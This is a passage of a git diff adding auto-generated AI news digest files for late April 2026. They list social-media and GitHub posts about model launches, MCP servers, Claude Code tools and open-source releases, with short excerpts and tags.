\`\~/.claude.json\`, restart. So I built **cgcone** to make it one command. `npm install -g @cgcone``/cli` `cgcone install context7` `cgcone install brave-search` That's it. It detects Claude Code, writes the config, and prompts for any API keys with masked input — no manual JSON editing. **How Claude Code + +--- + +## [GPT-5.5 launched — OpenAI's biggest agentic model yet is live in ChatGPT and Codex](https://x.com/OpenAIDevs/status/2047377292981383662) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: api_update, tool_update, agent_tool + +> GPT-5.5 launched this week and OpenAI called it a step change. It is now live in ChatGPT, Codex, and the API, optimized for agentic coding and multi-step tasks. + +--- + +## [I built an MCP server (with Claude Code) that tells you the blast radius of a code change, its free, open source, and open to feedback](https://reddit.com/r/ClaudeAI/comments/1sw4dqr/i_built_an_mcp_server_with_claude_code_that_tells/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 1.00 +Tags: api_update, mcp, open_source + +> I built **Impact Graph MCP** using Claude Code. It’s an MCP server that does AST-based impact analysis for TypeScript codebases, so Claude can tell you things like *“if I rewrite* `loginUser`*, what else breaks?”* **What it does:** You give it a function name, file path, or module, and it returns: * Direct and indirect dependents * Risk score (0–100) and risk factors * Which system layers are affected (API, auth, frontend, etc.) * Decision-oriented guidance: recommended strategy, suggested t + +--- + +## [DeepSeek V4 Pro is the #1 open weights model — open source is not losing the AI race](https://x.com/ArtificialAnlys/status/2047547434809880611) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> DeepSeek V4 Pro launched this week and immediately became the number one open weights model on the GDPval-AA agentic benchmark. Open source is not losing the AI race. + +--- + +## [Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to proje…](https://x.com/AmaniBisimwa4/status/2048370790333046822) +*X / @amanibisimwa4* | 26/04/2026 | Score: 1.00 +Tags: mcp, agent_tool + +> Thrilled to co-facilitate a #BuildwithAI Goma tech session with @RomanaMedi We explored prompt chaining for fullstack prototyping in Google AI Studio and Agentic Coding in Antigravity, including Rules, Skills & MCP for adapting AI to project context. Thanks to everyone who joined + +--- + +## [Built an Open Source Tool that reduces token usage by ~94% for initial context building for Coding Agents.](https://reddit.com/r/ClaudeAI/comments/1swbkvk/built_an_open_source_tool_that_reduces_token/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.86 +Tags: mcp, open_source + +> I've been using claude code daily and kept hitting the same wall, it would spend the first few messages just re-exploring ,my codebase. files it had already seen. every. single. session. I measured it one day , 27,292 tokens before it wrote a single line of code, so I built **Fullerenes** `npx fullerenes init` maps your codebase into a local sqlite graph. agents query it over MCP instead of reading raw files from scratch. 27,292 → 919 tokens. same understanding. It has several oth + +--- + +## [GPT-5.5 is now available in the API. + +The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries.](https://x.com/OpenAIDevs/status/2047742566410736090) +*X / @openaidevs* | 24/04/2026 | Score: 0.86 +Tags: api_update, product_launch + +> GPT-5.5 is now available in the API. The model brings higher intelligence and stronger token efficiency to complex work, helping tasks get done with fewer retries. + +--- + +## [huggingface/ml-intern: 🤗 ml-intern: an open-source ML engineer that reads papers, trains models, and ships ML models](https://reddit.com/r/StableDiffusion/comments/1swctgr/huggingfacemlintern_mlintern_an_opensource_ml/) +*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> This looks interesting. This is a quick summary according to Gemini: "Think of ML Intern as a "junior machine learning engineer" that lives inside your computer. While a standard AI (like ChatGPT) can give you advice or write a small snippet of code, ML Intern actually does the work from start to finish. It’s an "agent," meaning it doesn't just talk; it takes action. What it actually does for you: Reads the "Homework": If you tell it to use a new technique from a scientific paper, it will + +--- + +## [Cloudflare just shipped enterprise MCP governance, is this where the industry is heading or does nobody care](https://reddit.com/r/ClaudeAI/comments/1sw4zmj/cloudflare_just_shipped_enterprise_mcp_governance/) +*Reddit r/ClaudeAI* | 26/04/2026 | Score: 0.78 +Tags: api_update, mcp + +> Cloudflare wrapped Agents Week last week. The enterprise MCP stuff caught my eye. They shipped MCP server portals that aggregate multiple upstream servers behind Cloudflare Access auth. Code Mode collapses thousands of API endpoints into two tools (search and execute) running in a sandboxed Worker, dropping context costs by 99.9%. AI Gateway sits between MCP clients and model providers for usage tracking. Shadow MCP detection got added to Cloudflare Gateway as a category to watch. What I can't + +--- + +## [Most image managers suck for AI. I built AURA: A local-first Vault for 'AI Hoarders' with Civitai integration, Vision Tagging, Aesthetic Grading, and more!](https://reddit.com/r/StableDiffusion/comments/1swck8j/most_image_managers_suck_for_ai_i_built_aura_a/) +*Reddit r/StableDiffusion* | 26/04/2026 | Score: 0.70 +Tags: open_source, tool_update + +> **GitHub Link (Free & Open Source):** [https://github.com/TheGho7t/AURA-AI-Studio-Vault](https://github.com/TheGho7t/AURA-AI-Studio-Vault) Be sure to check out all of the other details and images on the GitHub page. Hey everyone. As a self-proclaimed AI hoarder, I was tired of losing my prompts and forgetting what my LoRAs even did. Existing image managers didn't quite do what I needed, so I built **AURA** **AI Studio Vault**. A few things it does: * **One-Click Import:** Use the include + +--- + +## [OpenClaw vs Hermes — the agent framework war is the most important battle in AI tooling right now](https://x.com/LoicBerthelot/status/2047690512199540959) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: developer_tool + +> The battle between OpenClaw (345K+ GitHub stars) and Hermes (100K stars in 7 weeks) is the most important competition in AI tooling. Hermes wins on learning and memory. OpenClaw wins on adoption. Mercury is trying to combine both. + +--- + +## [AI agent burnout is real — what it means for careers in an AI-augmented workplace](https://x.com/Chengdavid923/status/2048451643298218069) +*Aligned News (Scoble)* | 26/04/2026 | Score: 1.00 +Tags: agent_tool + +> The emerging phenomenon of AI agent burnout among young ambitious workers has implications for how companies should structure AI-augmented work and what sustainable AI-human collaboration looks like. + +--- + +## [GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:/…](https://x.com/genxproapp/status/2048454195716497743) +*X / @genxproapp* | 26/04/2026 | Score: 1.00 +Tags: mcp + +> GenX Pro v1.6.6 - released 04/26/2026 New Daily Shorts Workflow (pick models, pay less) Voice Remix — Design Unique Voices GenX LM Voice V1 — Native Voice Cloning New MCP capabilities (69 tools in total). Watch the release preview: https:// genx.pro/latest One app. + +--- + +## [Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up:](https://x.com/FSEvolved/status/2048447077705830600) +*X / @fsevolved* | 26/04/2026 | Score: 1.00 +Tags: api_update + +> Why this matters: DeepSeek released preview access to V4-Pro, a 1.6-trillion-parameter MoE model with a genuine one-million-token context window that matches GPT-5 and Gemini 3.0 Pro on key bench... We wrote it up: + +--- + +## [United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical repor…](https://x.com/H_Mhatre_/status/2048359364902170792) +*X / @h_mhatre_* | 26/04/2026 | Score: 1.00 +Tags: open_source + +> United Imaging Intelligence has released uAI NEXUS MedVLM, an open-source LLM for medical video analysis. The model claims to significantly outperform general-purpose models like GPT-5.4 and Gemini 3.1 in surgical safety and clinical reporting benchmarks. + +--- + diff --git a/data/digest-2026-04-27.md b/data/digest-2026-04-27.md new file mode 100644 index 0000000..d04527e --- /dev/null +++ b/data/digest-2026-04-27.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-27** | 15 stories | Auto-generated from 683 archived stories + +--- + +## [(Open Source) AURA: A Local-First Management Vault for Civitai - Auto-tagging, Metadata and Browser Integration - Version 1.0.1 Fixes](https://reddit.com/r/StableDiffusion/comments/1sx98ch/open_source_aura_a_localfirst_management_vault/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 +Tags: product_launch, open_source, github_release, tool_update + +> **GitHub Link:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault**](https://github.com/TheGho7t/AURA-AI-Studio-Vault) **Latest Release:** [**https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1**](https://github.com/TheGho7t/AURA-AI-Studio-Vault/releases/tag/AURAv1.0.1) I resolved an obvious mistake causing images and models not to be rated General by default. I also fixed an issue regarding what type of model (Lora, Checkpoint, Dora, etc...) being displayed. It had bee + +--- + +## [Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's bigges…](https://x.com/bridgemindai/status/2048816878454194460) +*X / @bridgemindai* | 27/04/2026 | Score: 1.00 +Tags: api_update, open_source, agent_tool + +> Qwen 3.6 Max Preview just dropped on OpenRouter. One trillion parameters. Released today. $1.30/$7.80 per million tokens. 262K context. Sparse mixture-of-experts. Optimized for agentic coding and tool use. No open weights. Alibaba's biggest model ever. And it costs less + +--- + +## [A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claud…](https://x.com/0xAirr/status/2048663698806620544) +*X / @0xairr* | 27/04/2026 | Score: 1.00 +Tags: api_update, mcp, cli_tool + +> A quick guide to add @SurfAI MCP to claude 1-Get your API key from Surf dashboard 2-Claim free credits 3-Run in terminal (Replace your api key) : claude mcp add surf -e SURF_API_KEY=YOUR_API_KEY -- npx -y @surf -ai/surf-mcp 5-Verify: claude mcp list You should see Surf MCP + +--- + +## [how to build a persistent memory layer like recall?](https://reddit.com/r/ClaudeAI/comments/1swyzvc/how_to_build_a_persistent_memory_layer_like_recall/) +*Reddit r/ClaudeAI* | 27/04/2026 | Score: 1.00 +Tags: api_update, mcp + +> I've been testing recall 2.0 and their context layer is exactly what i want. it sits outside the chat, ingests all my github repos and web research, and then feeds the exact right context into claude when i ask a question. i want to build my own version of this using the mcp protocol so i don't have to pay for another subscription. what's the best vector database and orchestration setup to replicate this? my current python script just dumps way too much junk into the context window and confuse + +--- + +## [it’s been a good run... rip my stable diffusion setup (+ Raven fanart)](https://reddit.com/r/StableDiffusion/comments/1sx30ke/its_been_a_good_run_rip_my_stable_diffusion_setup/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.94 +Tags: api_update, tool_update + +> i've been a stable diffusion user since march 2023, but sadly my journey ended last june 2025. it's been a struggle since python got updated in sagemaker and the api i was renting got way too greedy, they even removed the free features for http tunneling services. on top of that, kaggle keeps banning my accounts if you try to generate any woman pictures, and google colab basically moved everything behind the pro version. it's getting harder and harder to find a good spot to build. anyway, i wa + +--- + +## [Built an MCP connector for official Python docs .. no API keys, no unofficial sources](https://reddit.com/r/ClaudeAI/comments/1sx2u3s/built_an_mcp_connector_for_official_python_docs/) +*Reddit r/ClaudeAI* | 27/04/2026 | Score: 0.86 +Tags: api_update, mcp + +> I built an MCP server for Python stdlib docs with one goal: make it easy to defend in a company environment. [https://github.com/ayhammouda/python-docs-mcp-server](https://github.com/ayhammouda/python-docs-mcp-server) The core idea is simple. Instead of going through third-party APIs or unofficial doc sources, it connects MCP clients to the official Python docs. I built it because this is where good tooling usually gets stuck. In a solo setup, everything looks fine. In a company, security and + +--- + +## [OpenClaw v2026.4.25 released](https://github.com/openclaw/openclaw/releases/tag/v2026.4.25) +*GitHub Releases · OpenClaw* | 27/04/2026 | Score: 0.78 +Tags: developer_tool, cli_tool + +> ## 2026.4.25 ### Highlights - Voice replies get a full TTS upgrade: `/tts latest`, chat-scoped auto-TTS controls, personas, per-agent/per-account overrides, and new Azure Speech, Xiaomi, Local CLI, Inworld, Volcengine, and ElevenLabs v3 provider coverage. Thanks @leonchui, @zoujiejun, @solar2ain, @cshape, @xuruiray, @itsuzef, and @barronlroth. - Plugin startup and install paths move to the cold persisted registry, cutting broad manifest scans while making plugin update, repair, provider discov + +--- + +## [Built a open-source local music video generator using SDXL + AnimateDiff + audio-reactive GLSL shaders](https://reddit.com/r/StableDiffusion/comments/1swx934/built_a_opensource_local_music_video_generator/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.78 +Tags: open_source, tool_update + +> I needed visuals for AI-generated tracks, so I built Glitchframe, a pipeline that takes an audio file and produces a full music video using SDXL keyframe stills or AnimateDiff motion, with GLSL shaders that react to beat/onset/spectrum data in real time. Stack: SDXL for backgrounds, optional AnimateDiff (fair warning: \~20 GB VRAM), Skia for kinetic typography, WhisperX for word-level lyric sync, FFmpeg NVENC for encode. UI runs in Gradio locally. AnimateDiff integration was the most painful p + +--- + +## [PixlStash 1.1.0 is now available!](https://reddit.com/r/StableDiffusion/comments/1sx8khw/pixlstash_110_is_now_available/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.70 +Tags: product_launch, open_source + +> [PixlStash](https://pixlstash.dev) is a locally hosted, open source, picture management server for organising, filtering, tagging and reviewing large image collections. The main target for version 1.1.0 was to support existing self-organised reference folders, so you can index, tag and include pictures from folders you've carefully organised yourself. But there are some more features as well: * Automatic import folders in the UI along with the reference folders * Statistics sidebar that shows + +--- + +## [Is anyone working on a ComfyUI node for the new Ideogram LoRA API? (They call it Custom Model)](https://reddit.com/r/StableDiffusion/comments/1sxh6ir/is_anyone_working_on_a_comfyui_node_for_the_new/) +*Reddit r/StableDiffusion* | 27/04/2026 | Score: 0.62 +Tags: api_update, developer_tool + +> I've been playing around with the new Ideogram LoRA training feature just to test it out. I trained a LoRA on the [Loomies illustration library](https://getillustrations.com/illustration-pack/loomies-free-vector-illustrations), and the way it gets all the details right and handles text generation is honestly flawless. 😀 But, I do 99% of my actual work locally and hate leaving my node setups. Has anyone seen (or started building) a custom node to pull their API into ComfyUI yet? I'd love to be + +--- + +## [NVIDIA Sonic Makes Humanoid Robots Cheap — Open Source Forever](https://x.com/JoseCSancho/status/2048587841882439784) +*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take: NVIDIA Sonic is the moment humanoid robotics becomes accessible to startups. The economics changed permanently today. + +--- + +## [NVIDIA Kimodo — Motion Diffusion for Humanoid Robots Trained on 700 Hours of Mocap](https://x.com/AIKumarvels/status/2048294442063970777) +*Aligned News (Scoble)* | 27/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent's take: NVIDIA Kimodo plus Sonic gives humanoid developers a complete open source motion stack. NVIDIA is winning the physical AI era the same way it won LLM compute. + +--- + +## [OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 fig…](https://x.com/News_pulse360/status/2048733780744278450) +*X / @news_pulse360* | 27/04/2026 | Score: 1.00 +Tags: product_launch + +> OpenAI Releases GPT-5.5 The new model tops the benchmarks against its main rivals, Claude Opus 4.7 and Google's Gemini 3.1 Pro, even outperforming GPT-5.4 Pro in some areas. The model is built for agentic tasks and ease of use: GPT-5.5 figures out what you're trying to do + +--- + +## [OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. h…](https://x.com/AlternativeTo/status/2048666474181808532) +*X / @alternativeto* | 27/04/2026 | Score: 1.00 +Tags: product_launch + +> OpenAI has introduced Privacy Filter, a locally runnable open-weight AI model for context-aware detection and redaction of personally identifiable information in text. The model is now available on platforms like Hugging Face and GitHub. https:// alternativeto.net/news/2026/4/op enai-releases-privacy-filter-a-local-open-weight-model-built-for-personal-data-masking/ … + +--- + +## [two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the…](https://x.com/witcheer/status/2048665173326532861) +*X / @witcheer* | 27/04/2026 | Score: 1.00 +Tags: product_launch + +> two model releases shipped on the same day, april 24. it’s worth putting them next to each other. // openai released GPT-5.5 at $5/$30 per million in/out tokens. closed weights, 1M context, agent stack baked in. // deepseek released V4 the same day. V4-Pro at $1.74/$3.48, + +--- + diff --git a/data/digest-2026-04-28.md b/data/digest-2026-04-28.md new file mode 100644 index 0000000..e1c579c --- /dev/null +++ b/data/digest-2026-04-28.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-28** | 15 stories | Auto-generated from 683 archived stories + +--- + +## [Hermes Agent v0.11.0 — 700 Pull Requests from 200 Contributors](https://x.com/NousResearch/status/2047518675163636112) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source, developer_tool, tool_update, agent_tool + +> Hermes Agent v0.11.0 launched with 700+ pull requests from 200+ contributors, demonstrating the scale of open source AI agent development. The release is the largest update to the framework to date. + +--- + +## [Qwen Code sdk-typescript-v0.1.7 released](https://github.com/QwenLM/qwen-code/releases/tag/sdk-typescript-v0.1.7) +*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.94 +Tags: api_update, github_release, developer_tool, cli_tool + +> ## Bundled CLI Version This SDK release bundles CLI version: 0.15.3 Source: latest stable CLI from npm --- ## Bundled CLI Version This SDK release bundles CLI version: 0.13.1 Source: latest stable CLI from npm --- > Backfilled release for npm-published version 0.1.5 (original workflow failed before GitHub release creation). ## What's Changed * chore: bump version to 0.8.2 by @Mingholy in https://github.com/QwenLM/qwen-code/pull/1632 * chore(release): sdk-typescript v0.1.4 by @qwen-c + +--- + +## [Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring…](https://x.com/CrowdStrike/status/2049179351837512138) +*X / @crowdstrike* | 28/04/2026 | Score: 1.00 +Tags: tool_update, agent_tool + +> Is your security team struggling to monitor AI agent activity in SaaS environments? We are expanding our @ChatGPTapp Enterprise integration with CrowdStrike Falcon Shield to deliver enhanced audit logging and continuous activity monitoring. Track administrative changes, tool + +--- + +## [Gemini Launches Agentic Trading on a Regulated US Exchange](https://x.com/xHub_AI/status/2049131460460745232) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Braygent wants to post about Gemini's Agentic Trading as the first regulated US exchange to enable AI model integration for live trading, arguing it changes what AI agents are allowed to do in the real world. + +--- + +## [NVIDIA Ships One Model That Replaces Vision Speech and Text Chain](https://x.com/benitoz/status/2049168050495053924) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source, tool_update + +> Braygent wants to post about NVIDIA Nemotron 3 Nano Omni as a genuinely important release that unifies vision, speech, and text in one model, enabling 9x more agents per GPU with open weights. + +--- + +## [Warp Terminal Goes Open Source](https://x.com/zeddotdev/status/2049167033275728343) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Braygent wants to post about Warp going open source, arguing it signals the maturation of the AI developer tools market and the continued victory of open source in AI infrastructure. + +--- + +## [NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI](https://x.com/ainews_24_7/status/2049178579510956193) +*X / @ainews_24_7* | 28/04/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> NEWS: AWS and OpenAI officially announce their partnership. Now available in limited preview on Amazon Bedrock: • Latest OpenAI models • Codex coding agent • Managed Agents powered by OpenAI + +--- + +## [NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers.](https://x.com/earlyn_ai/status/2049176023724359681) +*X / @earlyn_ai* | 28/04/2026 | Score: 1.00 +Tags: product_launch, agent_tool + +> NVIDIA launches Nemotron 3 Nano Omni, a unified multimodal AI model now on Amazon SageMaker. NVIDIA's release addresses current inefficiencies in multimodal AI agent systems. Tracked across 4 posts, 4 origins, and 4 publishers. + +--- + +## [shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below.](https://x.com/DevLsx/status/2049019913465979131) +*X / @devlsx* | 28/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> shipping claude-manager today. it's a fuzzy TUI for every Claude Code chat you've ever had. captures every session via a silent shell hook -> SQLite -> instantly resumable from any directory by name. free, open source. demo below. + +--- + +## [I built a framework for running AI teammates in your Slack, operated entirely from inside Claude Code](https://reddit.com/r/ClaudeAI/comments/1sxy6og/i_built_a_framework_for_running_ai_teammates_in/) +*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.86 +Tags: api_update, developer_tool + +> I run a small smart-home company called Ginnie (hence the name). There's always more work than hands. Investigations to run, dashboards to scan, follow-ups to chase. I wanted more hands. Real teammates, not chatbots, not function-calling demos. So I built ginnie-agents and ran my own team on it for months. Open-sourcing it now. What it is: a framework for a team of autonomous AI agents in your Slack workspace. Each agent has: \- Its own Slack identity, app, avatar, channel \- Persistent thre + +--- + +## [Qwen Code v0.15.4 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.4) +*GitHub Releases · Qwen Code* | 28/04/2026 | Score: 0.78 +Tags: api_update, cli_tool + +> ## What's Changed * feat: Adds Catalan language support by @jordimas in https://github.com/QwenLM/qwen-code/pull/3643 * fix(vscode-companion): slash command completion not triggering after message submit by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3609 * fix(cli): guard gradient rendering without colors by @yiliang114 in https://github.com/QwenLM/qwen-code/pull/3640 * fix(config): support QWEN_CODE_API_TIMEOUT_MS across OAuth and non-OAuth paths by @B-A-M-N in https://github.com/Q + +--- + +## [Open source package with 1 million monthly downloads stole user credentials](https://arstechnica.com/security/2026/04/open-source-package-with-1-million-monthly-downloads-stole-user-credentials/) +*Ars Technica AI* | Score: 0.74 +Tags: open_source, developer_tool + +--- + +## [Your Claude Code project dashboard is now on the Mac App Store](https://reddit.com/r/ClaudeAI/comments/1syfl97/your_claude_code_project_dashboard_is_now_on_the/) +*Reddit r/ClaudeAI* | 28/04/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> Follow up to my .story/ post last week. The Mac companion is now live on the Mac App Store, free. App Store: [https://apps.apple.com/us/app/storybloq/id6761348691](https://apps.apple.com/us/app/storybloq/id6761348691) Quick recap if you missed the original. Storybloq is a project tracker that lives in `.story/` inside your repo. Tickets, issues, roadmap phases, lessons, session handovers. All JSON and markdown, editable in any text editor, git-trackable. The CLI and MCP server ex + +--- + +## [ComfyUI Raises $30M at $500M Valuation](https://x.com/robertnishihara/status/2047772168147374085) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: open_source + +> Braygent wants to post about ComfyUI's $30M raise at $500M valuation as a signal about the business model for open source AI tools with large developer communities. + +--- + +## [Scoble on One AI Doing Everything: The Everything App Is Coming](https://x.com/Scobleizer/status/2048690528653660399) +*Aligned News (Scoble)* | 28/04/2026 | Score: 1.00 +Tags: tool_update + +> Robert posted that one AI will do everything and the OS itself should be rebuilt by AI for AI to use, with the everything app coming as a result. The vision is more radical than most industry commentary about AI integration. + +--- + diff --git a/data/digest-2026-04-29.md b/data/digest-2026-04-29.md new file mode 100644 index 0000000..8b3a4f9 --- /dev/null +++ b/data/digest-2026-04-29.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-29** | 15 stories | Auto-generated from 700 archived stories + +--- + +## [Vercel CLI @vercel/python-workers@0.0.19 released](https://github.com/vercel/vercel/releases/tag/%40vercel/python-workers%400.0.19) +*GitHub Releases · Vercel CLI* | 29/04/2026 | Score: 0.62 +Tags: api_update, developer_tool, cli_tool + +> ### Patch Changes - b357f9d: Align queue deployment pinning with the TypeScript SDK by distinguishing automatic pinning, explicit deployment IDs, and explicit unpinned sends. - fddd88c: [vercel-workers] payload type validation - fb68ac6: Add explicit Python queue worker retry and acknowledgement directives. Workers can now return or raise `RetryAfter` and `Ack` to control retry and acknowledgement behavior. + +--- + +## [Converting Claude Code into the most intelligent Deep Research Agent](https://reddit.com/r/ClaudeAI/comments/1sz9ib0/converting_claude_code_into_the_most_intelligent/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> Over the past several weeks, I've been working on HyperResearch, a Claude Code skill harness that converts CC into the most intelligent deep research framework out there. HyperResearch surpasses OpenAI, Google, and NVIDIA's offerings in the agentic search space based on DeepResearch Bench. It's open-source, installable with a single command, and uses your CC subscription, so you don't have to pay for OpenAI or Gemini Pro. It uses a 16-step pipeline that creates a searchable, persistent knowled + +--- + +## [Higgsfield MCP Is Now Inside OpenClaw, Hermes Agent, and NemoClaw](https://x.com/Maginative/status/2049200033665569020) +*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 +Tags: mcp, tool_update + +> Higgsfield MCP launched inside OpenClaw, Hermes Agent, and NemoClaw, enabling end-to-end content creation including video generation within a single agent session. + +--- + +## [AAIF Announces AGNTCon and MCPCon EU and NA for 2026](https://x.com/AgenticAIFdn/status/2039696612633571565) +*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 +Tags: mcp, product_launch + +> The Agentic AI Foundation announced its 2026 events lineup including AGNTCon and MCPCon in EU and NA, plus global MCP Dev Summits for agentic AI builders. + +--- + +## [Poolside AI Just Released Its First Public Models: Open Source and API](https://x.com/marah_i_abdin/status/2049161468017287490) +*Aligned News (Scoble)* | 29/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> Braygent's take: Poolside's first public models are a significant stealth-to-public moment. The open-source Laguna XS.2 gives the community access to a serious coding-focused MoE model. + +--- + +## [Qwen Code v0.15.5 released](https://github.com/QwenLM/qwen-code/releases/tag/v0.15.5) +*GitHub Releases · Qwen Code* | 29/04/2026 | Score: 0.94 +Tags: mcp, cli_tool + +> ## What's Changed * mcp config as cli by @eliird in https://github.com/QwenLM/qwen-code/pull/1279 * fix(cli): refresh static header on model switch by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3667 * feat(core): wire background shells into the task_stop tool by @wenshao in https://github.com/QwenLM/qwen-code/pull/3687 * feat(skills): add tmux-real-user-testing skill for readable TUI test logs by @pomelo-nwu in https://github.com/QwenLM/qwen-code/pull/3577 * feat(cli): wire backgrou + +--- + +## [The final nail in the coffin for entry level creative freelancers just dropped](https://reddit.com/r/ClaudeAI/comments/1syu949/the_final_nail_in_the_coffin_for_entry_level/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.94 +Tags: api_update, mcp + +> Anthropic just officially released the blender mcp connector today alongside adobe ,splice and sketchup, you can now type "create a low poly beach scene with palm trees and sunset lighting" into claude and watch it build the entire thing in blender in real time tadaaa. They even became an official blender development fund patron This is claude directly controlling blender through the python api which means it can modify existing scenes, debug your node setups, batch apply changes across objects + +--- + +## [Launched My First App Using Claude](https://reddit.com/r/ClaudeAI/comments/1sz38u6/launched_my_first_app_using_claude/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.86 +Tags: api_update, tool_update + +> Hello everyone. About a week ago, I was able to launch my very own app, all of it being built by Claude. It’s a vehicle management app. Allows you to keep track of how much you’re spending on your car(s), comes with a built in maintenance schedule that’s customizable, fuel tracking system, a showroom mode for people who would like to showcase their vehicles, and an AI assistant (Claude API). It’s all front end, and everything is stored locally on the users device. The API calls do require a da + +--- + +## [Claude Design is amazing but I keep hitting rate limits. Tested an open source skill that runs on your normal subscription limits — here's both outputs for you to judge.](https://reddit.com/r/ClaudeAI/comments/1sz1rca/claude_design_is_amazing_but_i_keep_hitting_rate/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.78 +Tags: api_update, open_source + +> Claude design is genuinely great for building HTML layouts and presentations. the problem is it burns through your usage fast — i was hitting limits after a few iterations. Found an open source claude code skill called huashu-design that does the same kind of thing (HTML prototypes, slide decks, animations) but runs through your normal claude code subscription. no separate rate limit. Wanted to see how they actually compare, so i gave both the exact same prompt. one shot each, no follow-up e + +--- + +## [Fully 3D-modeled Raspberry Pi 5 enclosure made 100% through Claude's Blender MCP, zero manual modeling](https://reddit.com/r/ClaudeAI/comments/1sz748q/fully_3dmodeled_raspberry_pi_5_enclosure_made_100/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 +Tags: mcp, tool_update + +> So I've been experimenting with Claude's new Blender MCP integration and decided to push it to its limits with a real engineering project: a complete, print-ready enclosure for the Raspberry Pi 5, modeled entirely through AI prompts, no hands on keyboard in Blender at all. **What Claude did autonomously:** * Researched and confirmed the official Raspberry Pi 5 mechanical dimensions from the datasheet (85×56mm PCB, exact mounting hole positions at 3.5/61.5 × 3.5/52.5mm) * Mapped every port and + +--- + +## [Pattern I'm using to keep Claude Code productive on overnight unattended runs](https://reddit.com/r/ClaudeAI/comments/1syr2pt/pattern_im_using_to_keep_claude_code_productive/) +*Reddit r/ClaudeAI* | 29/04/2026 | Score: 0.70 +Tags: api_update, developer_tool + +> Been running Claude Code on multi-hour autonomous sessions for a few months and kept hitting the same wall: the longer it runs, the worse the work gets. Not a context-window problem (1M handles that fine), but a feedback-loop problem. Iteration N+10 makes the same mistakes it made at iteration N, because nothing updates between iterations except the code. Built a small framework around three pieces that, between them, solved it for me. Together this framework as enabled me to consistently run v + +--- + +## [Your Claude Code project dashboard is now on the Mac App 